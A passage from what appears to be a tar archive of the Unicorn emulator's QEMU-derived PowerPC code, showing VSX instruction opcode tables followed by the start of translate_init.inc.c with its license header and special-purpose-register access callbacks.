GEN_XX2FORM_EO(xvxexpsp, 0x16, 0x1D, 0x08, PPC2_ISA300), GEN_XX2FORM_EO(xvxsigsp, 0x16, 0x1D, 0x09, PPC2_ISA300), /* DCMX = bit[25] << 6 | bit[29] << 5 | bit[11:15] */ #define GEN_XX2FORM_DCMX(name, opc2, opc3, fl2) \ GEN_XX3FORM(name, opc2, opc3 | 0, fl2), \ GEN_XX3FORM(name, opc2, opc3 | 1, fl2) GEN_XX2FORM_DCMX(xvtstdcdp, 0x14, 0x1E, PPC2_ISA300), GEN_XX2FORM_DCMX(xvtstdcsp, 0x14, 0x1A, PPC2_ISA300), GEN_XX2FORM(xvabsdp, 0x12, 0x1D, PPC2_VSX), GEN_XX2FORM(xvnabsdp, 0x12, 0x1E, PPC2_VSX), GEN_XX2FORM(xvnegdp, 0x12, 0x1F, PPC2_VSX), GEN_XX3FORM(xvcpsgndp, 0x00, 0x1E, PPC2_VSX), GEN_XX2FORM(xvabssp, 0x12, 0x19, PPC2_VSX), GEN_XX2FORM(xvnabssp, 0x12, 0x1A, PPC2_VSX), GEN_XX2FORM(xvnegsp, 0x12, 0x1B, PPC2_VSX), GEN_XX3FORM(xvcpsgnsp, 0x00, 0x1A, PPC2_VSX), GEN_XX3FORM(xsadddp, 0x00, 0x04, PPC2_VSX), GEN_VSX_XFORM_300(xsaddqp, 0x04, 0x00, 0x0), GEN_XX3FORM(xssubdp, 0x00, 0x05, PPC2_VSX), GEN_XX3FORM(xsmuldp, 0x00, 0x06, PPC2_VSX), GEN_VSX_XFORM_300(xsmulqp, 0x04, 0x01, 0x0), GEN_XX3FORM(xsdivdp, 0x00, 0x07, PPC2_VSX), GEN_XX2FORM(xsredp, 0x14, 0x05, PPC2_VSX), GEN_XX2FORM(xssqrtdp, 0x16, 0x04, PPC2_VSX), GEN_XX2FORM(xsrsqrtedp, 0x14, 0x04, PPC2_VSX), GEN_XX3FORM(xstdivdp, 0x14, 0x07, PPC2_VSX), GEN_XX2FORM(xstsqrtdp, 0x14, 0x06, PPC2_VSX), GEN_XX3FORM_NAME(xsmadddp, "xsmaddadp", 0x04, 0x04, PPC2_VSX), GEN_XX3FORM_NAME(xsmadddp, "xsmaddmdp", 0x04, 0x05, PPC2_VSX), GEN_XX3FORM_NAME(xsmsubdp, "xsmsubadp", 0x04, 0x06, PPC2_VSX), GEN_XX3FORM_NAME(xsmsubdp, "xsmsubmdp", 0x04, 0x07, PPC2_VSX), GEN_XX3FORM_NAME(xsnmadddp, "xsnmaddadp", 0x04, 0x14, PPC2_VSX), GEN_XX3FORM_NAME(xsnmadddp, "xsnmaddmdp", 0x04, 0x15, PPC2_VSX), GEN_XX3FORM_NAME(xsnmsubdp, "xsnmsubadp", 0x04, 0x16, PPC2_VSX), GEN_XX3FORM_NAME(xsnmsubdp, "xsnmsubmdp", 0x04, 0x17, PPC2_VSX), GEN_XX3FORM(xscmpeqdp, 0x0C, 0x00, PPC2_ISA300), GEN_XX3FORM(xscmpgtdp, 0x0C, 0x01, PPC2_ISA300), GEN_XX3FORM(xscmpgedp, 0x0C, 0x02, PPC2_ISA300), GEN_XX3FORM(xscmpnedp, 0x0C, 0x03, PPC2_ISA300), GEN_XX3FORM(xscmpexpdp, 0x0C, 0x07, PPC2_ISA300), GEN_VSX_XFORM_300(xscmpexpqp, 0x04, 0x05, 0x00600001), GEN_XX2IFORM(xscmpodp, 0x0C, 0x05, PPC2_VSX), GEN_XX2IFORM(xscmpudp, 0x0C, 0x04, PPC2_VSX), GEN_VSX_XFORM_300(xscmpoqp, 0x04, 0x04, 0x00600001), GEN_VSX_XFORM_300(xscmpuqp, 0x04, 0x14, 0x00600001), GEN_XX3FORM(xsmaxdp, 0x00, 0x14, PPC2_VSX), GEN_XX3FORM(xsmindp, 0x00, 0x15, PPC2_VSX), GEN_XX3FORM(xsmaxcdp, 0x00, 0x10, PPC2_ISA300), GEN_XX3FORM(xsmincdp, 0x00, 0x11, PPC2_ISA300), GEN_XX3FORM(xsmaxjdp, 0x00, 0x12, PPC2_ISA300), GEN_XX3FORM(xsminjdp, 0x00, 0x13, PPC2_ISA300), GEN_XX2FORM_EO(xscvdphp, 0x16, 0x15, 0x11, PPC2_ISA300), GEN_XX2FORM(xscvdpsp, 0x12, 0x10, PPC2_VSX), GEN_XX2FORM(xscvdpspn, 0x16, 0x10, PPC2_VSX207), GEN_XX2FORM_EO(xscvhpdp, 0x16, 0x15, 0x10, PPC2_ISA300), GEN_VSX_XFORM_300_EO(xscvsdqp, 0x04, 0x1A, 0x0A, 0x00000001), GEN_XX2FORM(xscvspdp, 0x12, 0x14, PPC2_VSX), GEN_XX2FORM(xscvspdpn, 0x16, 0x14, PPC2_VSX207), GEN_XX2FORM(xscvdpsxds, 0x10, 0x15, PPC2_VSX), GEN_XX2FORM(xscvdpsxws, 0x10, 0x05, PPC2_VSX), GEN_XX2FORM(xscvdpuxds, 0x10, 0x14, PPC2_VSX), GEN_XX2FORM(xscvdpuxws, 0x10, 0x04, PPC2_VSX), GEN_XX2FORM(xscvsxddp, 0x10, 0x17, PPC2_VSX), GEN_VSX_XFORM_300_EO(xscvudqp, 0x04, 0x1A, 0x02, 0x00000001), GEN_XX2FORM(xscvuxddp, 0x10, 0x16, PPC2_VSX), GEN_XX2FORM(xsrdpi, 0x12, 0x04, PPC2_VSX), GEN_XX2FORM(xsrdpic, 0x16, 0x06, PPC2_VSX), GEN_XX2FORM(xsrdpim, 0x12, 0x07, PPC2_VSX), GEN_XX2FORM(xsrdpip, 0x12, 0x06, PPC2_VSX), GEN_XX2FORM(xsrdpiz, 0x12, 0x05, PPC2_VSX), GEN_XX3FORM(xsaddsp, 0x00, 0x00, PPC2_VSX207), GEN_XX3FORM(xssubsp, 0x00, 0x01, PPC2_VSX207), GEN_XX3FORM(xsmulsp, 0x00, 0x02, PPC2_VSX207), GEN_XX3FORM(xsdivsp, 0x00, 0x03, PPC2_VSX207), GEN_VSX_XFORM_300(xsdivqp, 0x04, 0x11, 0x0), GEN_XX2FORM(xsresp, 0x14, 0x01, PPC2_VSX207), GEN_XX2FORM(xsrsp, 0x12, 0x11, PPC2_VSX207), GEN_XX2FORM(xssqrtsp, 0x16, 0x00, PPC2_VSX207), GEN_XX2FORM(xsrsqrtesp, 0x14, 0x00, PPC2_VSX207), GEN_XX3FORM_NAME(xsmaddsp, "xsmaddasp", 0x04, 0x00, PPC2_VSX207), GEN_XX3FORM_NAME(xsmaddsp, "xsmaddmsp", 0x04, 0x01, PPC2_VSX207), GEN_XX3FORM_NAME(xsmsubsp, "xsmsubasp", 0x04, 0x02, PPC2_VSX207), GEN_XX3FORM_NAME(xsmsubsp, "xsmsubmsp", 0x04, 0x03, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmaddsp, "xsnmaddasp", 0x04, 0x10, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmaddsp, "xsnmaddmsp", 0x04, 0x11, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmsubsp, "xsnmsubasp", 0x04, 0x12, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmsubsp, "xsnmsubmsp", 0x04, 0x13, PPC2_VSX207), GEN_XX2FORM(xscvsxdsp, 0x10, 0x13, PPC2_VSX207), GEN_XX2FORM(xscvuxdsp, 0x10, 0x12, PPC2_VSX207), GEN_XX3FORM(xvadddp, 0x00, 0x0C, PPC2_VSX), GEN_XX3FORM(xvsubdp, 0x00, 0x0D, PPC2_VSX), GEN_XX3FORM(xvmuldp, 0x00, 0x0E, PPC2_VSX), GEN_XX3FORM(xvdivdp, 0x00, 0x0F, PPC2_VSX), GEN_XX2FORM(xvredp, 0x14, 0x0D, PPC2_VSX), GEN_XX2FORM(xvsqrtdp, 0x16, 0x0C, PPC2_VSX), GEN_XX2FORM(xvrsqrtedp, 0x14, 0x0C, PPC2_VSX), GEN_XX3FORM(xvtdivdp, 0x14, 0x0F, PPC2_VSX), GEN_XX2FORM(xvtsqrtdp, 0x14, 0x0E, PPC2_VSX), GEN_XX3FORM_NAME(xvmadddp, "xvmaddadp", 0x04, 0x0C, PPC2_VSX), GEN_XX3FORM_NAME(xvmadddp, "xvmaddmdp", 0x04, 0x0D, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubdp, "xvmsubadp", 0x04, 0x0E, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubdp, "xvmsubmdp", 0x04, 0x0F, PPC2_VSX), GEN_XX3FORM_NAME(xvnmadddp, "xvnmaddadp", 0x04, 0x1C, PPC2_VSX), GEN_XX3FORM_NAME(xvnmadddp, "xvnmaddmdp", 0x04, 0x1D, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubdp, "xvnmsubadp", 0x04, 0x1E, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubdp, "xvnmsubmdp", 0x04, 0x1F, PPC2_VSX), GEN_XX3FORM(xvmaxdp, 0x00, 0x1C, PPC2_VSX), GEN_XX3FORM(xvmindp, 0x00, 0x1D, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpeqdp, 0x0C, 0x0C, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgtdp, 0x0C, 0x0D, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgedp, 0x0C, 0x0E, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpnedp, 0x0C, 0x0F, PPC2_ISA300), GEN_XX2FORM(xvcvdpsp, 0x12, 0x18, PPC2_VSX), GEN_XX2FORM(xvcvdpsxds, 0x10, 0x1D, PPC2_VSX), GEN_XX2FORM(xvcvdpsxws, 0x10, 0x0D, PPC2_VSX), GEN_XX2FORM(xvcvdpuxds, 0x10, 0x1C, PPC2_VSX), GEN_XX2FORM(xvcvdpuxws, 0x10, 0x0C, PPC2_VSX), GEN_XX2FORM(xvcvsxddp, 0x10, 0x1F, PPC2_VSX), GEN_XX2FORM(xvcvuxddp, 0x10, 0x1E, PPC2_VSX), GEN_XX2FORM(xvcvsxwdp, 0x10, 0x0F, PPC2_VSX), GEN_XX2FORM(xvcvuxwdp, 0x10, 0x0E, PPC2_VSX), GEN_XX2FORM(xvrdpi, 0x12, 0x0C, PPC2_VSX), GEN_XX2FORM(xvrdpic, 0x16, 0x0E, PPC2_VSX), GEN_XX2FORM(xvrdpim, 0x12, 0x0F, PPC2_VSX), GEN_XX2FORM(xvrdpip, 0x12, 0x0E, PPC2_VSX), GEN_XX2FORM(xvrdpiz, 0x12, 0x0D, PPC2_VSX), GEN_XX3FORM(xvaddsp, 0x00, 0x08, PPC2_VSX), GEN_XX3FORM(xvsubsp, 0x00, 0x09, PPC2_VSX), GEN_XX3FORM(xvmulsp, 0x00, 0x0A, PPC2_VSX), GEN_XX3FORM(xvdivsp, 0x00, 0x0B, PPC2_VSX), GEN_XX2FORM(xvresp, 0x14, 0x09, PPC2_VSX), GEN_XX2FORM(xvsqrtsp, 0x16, 0x08, PPC2_VSX), GEN_XX2FORM(xvrsqrtesp, 0x14, 0x08, PPC2_VSX), GEN_XX3FORM(xvtdivsp, 0x14, 0x0B, PPC2_VSX), GEN_XX2FORM(xvtsqrtsp, 0x14, 0x0A, PPC2_VSX), GEN_XX3FORM_NAME(xvmaddsp, "xvmaddasp", 0x04, 0x08, PPC2_VSX), GEN_XX3FORM_NAME(xvmaddsp, "xvmaddmsp", 0x04, 0x09, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubsp, "xvmsubasp", 0x04, 0x0A, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubsp, "xvmsubmsp", 0x04, 0x0B, PPC2_VSX), GEN_XX3FORM_NAME(xvnmaddsp, "xvnmaddasp", 0x04, 0x18, PPC2_VSX), GEN_XX3FORM_NAME(xvnmaddsp, "xvnmaddmsp", 0x04, 0x19, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubsp, "xvnmsubasp", 0x04, 0x1A, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubsp, "xvnmsubmsp", 0x04, 0x1B, PPC2_VSX), GEN_XX3FORM(xvmaxsp, 0x00, 0x18, PPC2_VSX), GEN_XX3FORM(xvminsp, 0x00, 0x19, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpeqsp, 0x0C, 0x08, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgtsp, 0x0C, 0x09, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgesp, 0x0C, 0x0A, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpnesp, 0x0C, 0x0B, PPC2_ISA300), GEN_XX2FORM(xvcvspdp, 0x12, 0x1C, PPC2_VSX), GEN_XX2FORM(xvcvspsxds, 0x10, 0x19, PPC2_VSX), GEN_XX2FORM(xvcvspsxws, 0x10, 0x09, PPC2_VSX), GEN_XX2FORM(xvcvspuxds, 0x10, 0x18, PPC2_VSX), GEN_XX2FORM(xvcvspuxws, 0x10, 0x08, PPC2_VSX), GEN_XX2FORM(xvcvsxdsp, 0x10, 0x1B, PPC2_VSX), GEN_XX2FORM(xvcvuxdsp, 0x10, 0x1A, PPC2_VSX), GEN_XX2FORM(xvcvsxwsp, 0x10, 0x0B, PPC2_VSX), GEN_XX2FORM(xvcvuxwsp, 0x10, 0x0A, PPC2_VSX), GEN_XX2FORM(xvrspi, 0x12, 0x08, PPC2_VSX), GEN_XX2FORM(xvrspic, 0x16, 0x0A, PPC2_VSX), GEN_XX2FORM(xvrspim, 0x12, 0x0B, PPC2_VSX), GEN_XX2FORM(xvrspip, 0x12, 0x0A, PPC2_VSX), GEN_XX2FORM(xvrspiz, 0x12, 0x09, PPC2_VSX), GEN_XX2FORM_EO(xxbrh, 0x16, 0x1D, 0x07, PPC2_ISA300), GEN_XX2FORM_EO(xxbrw, 0x16, 0x1D, 0x0F, PPC2_ISA300), GEN_XX2FORM_EO(xxbrd, 0x16, 0x1D, 0x17, PPC2_ISA300), GEN_XX2FORM_EO(xvcvhpsp, 0x16, 0x1D, 0x18, PPC2_ISA300), GEN_XX2FORM_EO(xvcvsphp, 0x16, 0x1D, 0x19, PPC2_ISA300), GEN_XX2FORM_EO(xxbrq, 0x16, 0x1D, 0x1F, PPC2_ISA300), #define VSX_LOGICAL(name, opc2, opc3, fl2) \ GEN_XX3FORM(name, opc2, opc3, fl2) VSX_LOGICAL(xxland, 0x8, 0x10, PPC2_VSX), VSX_LOGICAL(xxlandc, 0x8, 0x11, PPC2_VSX), VSX_LOGICAL(xxlor, 0x8, 0x12, PPC2_VSX), VSX_LOGICAL(xxlxor, 0x8, 0x13, PPC2_VSX), VSX_LOGICAL(xxlnor, 0x8, 0x14, PPC2_VSX), VSX_LOGICAL(xxleqv, 0x8, 0x17, PPC2_VSX207), VSX_LOGICAL(xxlnand, 0x8, 0x16, PPC2_VSX207), VSX_LOGICAL(xxlorc, 0x8, 0x15, PPC2_VSX207), GEN_XX3FORM(xxmrghw, 0x08, 0x02, PPC2_VSX), GEN_XX3FORM(xxmrglw, 0x08, 0x06, PPC2_VSX), GEN_XX3FORM(xxperm, 0x08, 0x03, PPC2_ISA300), GEN_XX3FORM(xxpermr, 0x08, 0x07, PPC2_ISA300), GEN_XX2FORM(xxspltw, 0x08, 0x0A, PPC2_VSX), GEN_XX1FORM(xxspltib, 0x08, 0x0B, PPC2_ISA300), GEN_XX3FORM_DM(xxsldwi, 0x08, 0x00), GEN_XX2FORM_EXT(xxextractuw, 0x0A, 0x0A, PPC2_ISA300), GEN_XX2FORM_EXT(xxinsertw, 0x0A, 0x0B, PPC2_ISA300), #define GEN_XXSEL_ROW(opc3) \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x18, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x19, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1A, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1B, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1C, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1D, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1E, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1F, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_XXSEL_ROW(0x00) GEN_XXSEL_ROW(0x01) GEN_XXSEL_ROW(0x02) GEN_XXSEL_ROW(0x03) GEN_XXSEL_ROW(0x04) GEN_XXSEL_ROW(0x05) GEN_XXSEL_ROW(0x06) GEN_XXSEL_ROW(0x07) GEN_XXSEL_ROW(0x08) GEN_XXSEL_ROW(0x09) GEN_XXSEL_ROW(0x0A) GEN_XXSEL_ROW(0x0B) GEN_XXSEL_ROW(0x0C) GEN_XXSEL_ROW(0x0D) GEN_XXSEL_ROW(0x0E) GEN_XXSEL_ROW(0x0F) GEN_XXSEL_ROW(0x10) GEN_XXSEL_ROW(0x11) GEN_XXSEL_ROW(0x12) GEN_XXSEL_ROW(0x13) GEN_XXSEL_ROW(0x14) GEN_XXSEL_ROW(0x15) GEN_XXSEL_ROW(0x16) GEN_XXSEL_ROW(0x17) GEN_XXSEL_ROW(0x18) GEN_XXSEL_ROW(0x19) GEN_XXSEL_ROW(0x1A) GEN_XXSEL_ROW(0x1B) GEN_XXSEL_ROW(0x1C) GEN_XXSEL_ROW(0x1D) GEN_XXSEL_ROW(0x1E) GEN_XXSEL_ROW(0x1F) GEN_XX3FORM_DM(xxpermdi, 0x08, 0x01), ��������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate_init.inc.c��������������������������������������������������0000664�0000000�0000000�00001463710�14675241067�0022173�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC CPU initialization for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright 2011 Freescale Semiconductor, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "cpu-models.h" #include "mmu-hash32.h" #include "mmu-hash64.h" #include "hw/ppc/ppc.h" #include "mmu-book3s-v3.h" #include "qemu/cutils.h" #include "fpu/softfloat.h" /* * Generic callbacks: * do nothing but store/retrieve spr value */ static void spr_load_dump_spr(TCGContext *tcg_ctx, int sprn) { #ifdef PPC_DUMP_SPR_ACCESSES TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn); gen_helper_load_dump_spr(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); #endif } static void spr_read_generic(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_load_spr(tcg_ctx, cpu_gpr[gprn], sprn); spr_load_dump_spr(tcg_ctx, sprn); } static void spr_store_dump_spr(int sprn) { #ifdef PPC_DUMP_SPR_ACCESSES TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn); gen_helper_store_dump_spr(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); #endif } static void spr_write_generic(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_store_spr(tcg_ctx, sprn, cpu_gpr[gprn]); spr_store_dump_spr(sprn); } static void spr_write_generic32(DisasContext *ctx, int sprn, int gprn) { #ifdef TARGET_PPC64 TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, cpu_gpr[gprn]); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); spr_store_dump_spr(sprn); #else spr_write_generic(ctx, sprn, gprn); #endif } static void spr_write_clear(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, t0, sprn); tcg_gen_neg_tl(tcg_ctx, t1, cpu_gpr[gprn]); tcg_gen_and_tl(tcg_ctx, t0, t0, t1); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void spr_access_nop(DisasContext *ctx, int sprn, int gprn) { } /* SPR common to all PowerPC */ /* XER */ static void spr_read_xer(DisasContext *ctx, int gprn, int sprn) { gen_read_xer(ctx, cpu_gpr[gprn]); } static void spr_write_xer(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_write_xer(tcg_ctx, cpu_gpr[gprn]); } /* LR */ static void spr_read_lr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[gprn], cpu_lr); } static void spr_write_lr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_lr, cpu_gpr[gprn]); } /* CFAR */ #if defined(TARGET_PPC64) static void spr_read_cfar(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[gprn], cpu_cfar); } static void spr_write_cfar(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_cfar, cpu_gpr[gprn]); } #endif /* CTR */ static void spr_read_ctr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[gprn], cpu_ctr); } static void spr_write_ctr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_ctr, cpu_gpr[gprn]); } /* User read access to SPR */ /* USPRx */ /* UMMCRx */ /* UPMCx */ /* USIA */ /* UDECR */ static void spr_read_ureg(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_load_spr(tcg_ctx, cpu_gpr[gprn], sprn + 0x10); } #if defined(TARGET_PPC64) static void spr_write_ureg(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_store_spr(tcg_ctx, sprn + 0x10, cpu_gpr[gprn]); } #endif /* SPR common to all non-embedded PowerPC */ /* DECR */ #if 0 static void spr_read_decr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_load_decr(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_stop_exception(ctx); } } #else #define spr_read_decr spr_read_generic #endif #if 0 static void spr_write_decr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_store_decr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_stop_exception(ctx); } } #else #define spr_write_decr spr_write_generic #endif /* SPR common to all non-embedded PowerPC, except 601 */ /* Time base */ #if 0 static void spr_read_tbl(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_load_tbl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_read_tbl spr_read_generic #endif #if 0 static void spr_read_tbu(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_load_tbu(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_read_tbu spr_read_generic #endif #if 0 // ATTRIBUTE_UNUSED static void spr_read_atbl(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_atbl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } // ATTRIBUTE_UNUSED static void spr_read_atbu(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_atbu(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } #endif #if 0 static void spr_write_tbl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_store_tbl(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_write_tbl spr_write_generic #endif #if 0 static void spr_write_tbu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_store_tbu(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_write_tbu spr_write_generic #endif #if 0 // ATTRIBUTE_UNUSED static void spr_write_atbl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_atbl(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } // ATTRIBUTE_UNUSED static void spr_write_atbu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_atbu(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } #endif #if defined(TARGET_PPC64) // ATTRIBUTE_UNUSED static void spr_read_purr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_purr(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } static void spr_write_purr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_purr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } /* HDECR */ static void spr_read_hdecr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_load_hdecr(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } static void spr_write_hdecr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_store_hdecr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } static void spr_read_vtb(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_vtb(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } static void spr_write_vtb(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_vtb(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_tbu40(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_tbu40(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } #endif /* IBAT0U...IBAT0U */ /* IBAT0L...IBAT7L */ static void spr_read_ibat(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, IBAT[sprn & 1][(sprn - SPR_IBAT0U) / 2])); } static void spr_read_ibat_h(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; 